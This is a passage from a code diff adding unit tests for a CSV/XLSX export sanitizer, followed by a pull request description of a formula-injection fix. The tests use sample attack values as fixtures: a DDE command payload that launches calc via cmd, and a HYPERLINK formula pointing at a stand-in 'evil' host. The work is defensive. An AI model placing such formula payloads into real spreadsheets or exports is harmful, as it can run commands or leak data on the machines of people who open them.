+    const record = { Area: 'Cardiff', Year: 2020, Notes: '=cmd|"/c calc"!A1' };
+    expect(neutralizeCsvRecord(record)).toEqual({
+      Area: 'Cardiff',
+      Year: 2020,
+      Notes: `'=cmd|"/c calc"!A1`
+    });
+  });
+
+  it('neutralizes a dangerous key (e.g. an attacker-controlled dimension name used as a header)', () => {
+    const record = { '=HYPERLINK("https://evil/")': 'value' };
+    expect(neutralizeCsvRecord(record)).toEqual({
+      [`'=HYPERLINK("https://evil/")`]: 'value'
+    });
+  });
+
+  it('leaves null and undefined values unchanged', () => {
+    const record = { a: null, b: undefined };
+    expect(neutralizeCsvRecord(record)).toEqual({ a: null, b: undefined });
+  });
+});


### PR DESCRIPTION
Dataset cell values, headers, and metadata were written to downloadable CSV/XLSX exports with no neutralization, so a publisher-controlled value starting with =, +, -, @, tab, or CR (e.g. a HYPERLINK/DDE payload) would be evaluated as a formula by Excel/LibreOffice/Sheets when an anonymous user opened the export. Added a shared neutralizeCsvCell/Row/Record helper that prefixes dangerous string values with an apostrophe, and applied it to headers and cells across all six export builders (consumer-view-v2, consumer-view v1, pivots) plus the two admin/ translation csv-stringify exports.